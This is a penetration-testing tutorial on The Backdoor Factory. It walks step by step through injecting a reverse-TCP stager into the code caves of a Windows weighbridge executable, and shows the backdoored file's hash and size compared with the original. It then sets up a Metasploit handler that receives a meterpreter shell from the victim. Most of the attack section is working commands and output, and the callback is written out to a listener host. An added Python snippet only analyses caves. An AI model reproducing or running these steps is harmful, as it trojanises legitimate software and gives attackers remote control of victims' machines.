# Lesson 9: Tool Introduction - the-backdoor-factory

Project address: <https://github.com/secretsquirrel/the-backdoor-factory>

## Principle

Executable binaries contain long runs of 0x00 bytes, usually alignment padding and slack at the end of sections, that carry no data at all. These runs are called "code caves". The Backdoor Factory writes its shellcode into such a cave and then patches the program's entry point so that execution jumps into the cave first; the shellcode runs, then hands control back to the original entry point so the program starts as usual. Because nothing is appended, the file keeps its original size and section layout, and only its hash changes.

## Example: the weighbridge system from an engagement

```bash
root@John:~/Desktop# git clone https://github.com/secretsquirrel/the-backdoor-factory.git
# Install the-backdoor-factory
```

![](/files/-LZJwqnlYRh7H5h-1bIk)

```bash
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -S
# Check whether this binary supports backdoor injection (-S)
```

![](/files/-LZJwqnnxPf0wWxDOnLf)

```bash
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -c -l 150
# Search for code caves (-c) large enough to hold a 150-byte payload (-l 150)
```

![](/files/-LZJwqnpUH0ApLUgJIe7)

```bash
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -s show
# List the available payloads
```

![](/files/-LZJwqnrdey7Kfb796h2)

```bash
root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -H 192.168.1.111 -P 8080 -s iat_reverse_tcp_stager_threaded
# Inject the payload and generate the backdoored file.
# -H / -P are the listener host and port; the stager must match the handler payload set below.
```

![](/files/-LZJwqntGvelhg1wyy0N)

```bash
root@John:~/Desktop/the-backdoor-factory# md5sum ./guobang.exe /root/demo/guobang.exe
# Compare the MD5 of the generated file with the original (the hashes differ)
```

![](/files/-LZJwqnv6TkhNpnFTwb9)

```bash
root@John:~/Desktop/the-backdoor-factory# du -k ./guobang.exe /root/demo/guobang.exe
# Compare file sizes; the payload went into existing caves, so nothing was appended and the size should match
```

![](/files/-LZJwqnxzQX0sIVWLXIz)
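The two ideas above, the cave search behind `-c -l 150` from the Principle section and the md5sum/du comparison, can be reproduced offline. The following is an added example written for this page; it is not code from the original page or from The Backdoor Factory. `find_caves` scans a file for runs of null bytes of at least the requested length, and `compare` reports what md5sum and du show plus where the bytes actually changed and whether the entry point was redirected into a cave. The sample binary is a constructed, PE-shaped buffer rather than a real program: only the header fields the example reads are populated, RVAs are treated as file offsets because the sample has no section table, and a block of 150 `0xCC` bytes stands in for a real stager.

```python
"""Cave search and before/after comparison for a cave-injected PE (added example)."""
from __future__ import annotations

import hashlib
import re
import struct


def find_caves(data: bytes, min_size: int) -> list:
    """Return (offset, length) for every run of 0x00 bytes at least min_size long.

    This is the idea behind `backdoor.py -c -l 150`: a cave is null padding the
    file does not use, so shellcode can be written there without growing the file.
    """
    return [(m.start(), m.end() - m.start())
            for m in re.finditer(rb"\x00{%d,}" % min_size, data)]


def entry_point(pe: bytes) -> int:
    """Read AddressOfEntryPoint from the PE optional header."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    # 4-byte signature + 20-byte COFF header, then AddressOfEntryPoint at +16
    return struct.unpack_from("<I", pe, e_lfanew + 24 + 16)[0]


def changed_ranges(a: bytes, b: bytes) -> list:
    """(offset, length) of each contiguous region where a and b differ."""
    ranges, start = [], None
    common = min(len(a), len(b))
    for i in range(common):
        if a[i] != b[i]:
            if start is None:
                start = i
        elif start is not None:
            ranges.append((start, i - start))
            start = None
    if start is not None:
        ranges.append((start, common - start))
    if len(a) != len(b):                      # appended or truncated tail
        ranges.append((common, abs(len(a) - len(b))))
    return ranges


def compare(original: bytes, patched: bytes, min_cave: int = 150) -> dict:
    """What md5sum/du tell you, plus where the modification landed."""
    caves = find_caves(original, min_cave)
    changes = changed_ranges(original, patched)
    in_cave = [any(c_off <= off and off + ln <= c_off + c_len for c_off, c_len in caves)
               for off, ln in changes]
    return {
        "md5_original": hashlib.md5(original).hexdigest(),
        "md5_patched": hashlib.md5(patched).hexdigest(),
        "same_size": len(original) == len(patched),
        "entry_point": (entry_point(original), entry_point(patched)),
        "changes": changes,
        "changes_in_caves": in_cave,
    }


def build_sample() -> tuple:
    """Constructed sample, not a real program: a minimal PE-shaped buffer and a
    copy patched the way a cave injection patches it. Only the header fields the
    example reads are populated, and RVAs are used as file offsets (no sections)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew -> PE header at 0x40
    coff = b"PE\0\0" + bytes(20)                         # signature + zeroed COFF header
    opt = bytearray(0xE0)                                # PE32 optional header
    code_start = 0x40 + len(coff) + len(opt)             # 0x138
    code = bytes([0x55, 0x8B, 0xEC, 0x90]) * 64          # 256 bytes standing in for code
    cave = bytes(0x200)                                  # 512-byte null run: the cave
    tail = b"\xC3" * 64
    fields = [("<H", 0, 0x10B), ("<I", 4, len(code)), ("<I", 16, code_start),
              ("<I", 28, 0x400000), ("<I", 32, 0x1000), ("<I", 36, 0x200),
              ("<I", 56, 0x1000), ("<I", 60, code_start), ("<H", 68, 2),
              ("<I", 92, 16)]
    for fmt, off, val in fields:                         # keep header null runs short
        struct.pack_into(fmt, opt, off, val)
    original = bytes(dos + coff + opt + code + cave + tail)

    cave_off = code_start + len(code)
    stub = b"\xCC" * 150                                 # placeholder for a 150-byte stager
    patched = bytearray(original)
    patched[cave_off:cave_off + len(stub)] = stub        # shellcode into the cave
    struct.pack_into("<I", patched, 0x40 + 24 + 16, cave_off)  # entry point -> cave
    return original, bytes(patched)


if __name__ == "__main__":
    orig, bd = build_sample()
    print("caves >= 150 bytes:", [(hex(o), n) for o, n in find_caves(orig, 150)])
    for k, v in compare(orig, bd).items():
        print(f"{k}: {v}")
```

Against a real pair of files, read both with `open(path, "rb").read()` and pass them to `compare`; a cave injection shows `same_size` true, a changed entry point, and every changed range inside a region that was null in the original. A real analysis would also map the entry point RVA to a file offset through the section table, which this sample omits.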

```bash
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.111
lhost => 192.168.1.111
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > exploit -j
# Start the local listener as a background job; host, port and payload must match the stager injected above
```

![](/files/-LZJwqnzy9cnLFdBVB1e)

Run the backdoored program:

![](/files/-LZJwqo05ZzWWs26q4qv)

```bash
meterpreter > getuid
Server username: John-PC\John
```

Confirm the target:

![](/files/-LZJwqo2xVp9DZANqk1m)

\--By Micropoor

